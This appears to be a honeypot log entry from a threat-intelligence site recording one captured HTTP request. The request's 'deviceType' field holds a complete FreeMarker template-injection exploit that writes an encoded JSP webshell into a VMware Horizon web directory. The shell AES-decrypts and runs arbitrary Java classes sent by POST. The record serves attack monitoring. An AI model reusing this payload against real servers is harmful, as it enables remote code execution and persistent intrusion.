Attack a50c6f7c-e29f-4a1e-a14b-7bfec7c4691b

Details

ID a50c6f7c-e29f-4a1e-a14b-7bfec7c4691b
Attack Type elasticsearch
IP Address 75.127.11.24
Username
Password
Client Version Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Country United States
Date 2023-06-04 08:48PM

Request Data

{
   "path": "",
   "method": "GET",
   "headers": {
     "Accept": "*/*",
     "Connection": "keep-alive",
     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40",
     "Accept-Encoding": "gzip, deflate"
   },
   "hostname": "localhost",
   "form_data": {
     "error": "",
     "deviceType": "${\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.io.FileOutputStream\",\"/opt/vmware/horizon/workspace/webapps/SAAS/jersey/manager/api/images/2907/1NsKqC3.jsp\").write(\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.lang.String\",\"%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525253C%25252525%25252540page%25252Bimport%2525253D%2525255C%25252522java.util.%2525252A%2525252Cjavax.crypto.%2525252A%2525252Cjavax.crypto.spec.%2525252A%2525255C%25252522%25252525%2525253E%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525253C%25252525%25252521%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bclass%25252BU%25252Bextends%25252BClassLoader%2525257B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252BU%25252528ClassLoader%25252Bc%25252529%25252B%2525257B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bsuper%25252528c%25252529%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525257D%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bpublic%25252BClass%25252Bg%25252528byte%25252B%2525255B%2525255Db%25252529%25252B%2525257B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Breturn%25252Bsuper.defineClass%25252528b%2525252C0%2525252Cb.length%25252529%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525257D%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525257D%25252525%2525253E%2525253C%25252525%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bif%25252B%25252528request.getMethod%25252528%25252529.equals%25252528%2525255C%25252522POST%2525255C%25252522%25252529%25252529%2525257B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252BString%25252Bk%2525253D%2525255C%25252522e45e329feb5d925b%2525255C%25252522%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bsession.putValue%25252528%2525255C%25252522u%2525255C%25252522%2525252Ck%25252529%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252BCipher%25252Bc%2525253DCipher.getInstance%25252528%2525255C%25252522AES%2525255C%25252522%25252529%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bc.init%252525282%2525252Cnew%25252BSecretKeySpec%25252528k.getBytes%25252528%25252529%2525252C%2525255C%25252522AES%2525255C%25252522%25252529%25252529%2525253B%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252Bnew%25252BU%25252528this.getClass%25252528%25252529.getClassLoader%25252528%25252529%25252529.g%25252528c.doFinal%25252528new%25252Bsun.misc.BASE64Decoder%25252528%25252529.decodeBuffer%25252528request.getReader%25252528%25252529.readLine%25252528%25252529%25252529%25252529%25252529.newInstance%25252528%25252529.equals%25252528pageContext%25252529%2525253B%2525257D%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252525%2525253E%2525250A%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%25252B%2525253C%25252525out.println%25252528%2525255C%25252522e8418d1d706cd73548f9f16f1d55ad6e%2525255C%25252522%25252529%25252B%2525253B%25252525%2525253E\").getBytes())}"
   }
 }
© 2021 threat.gg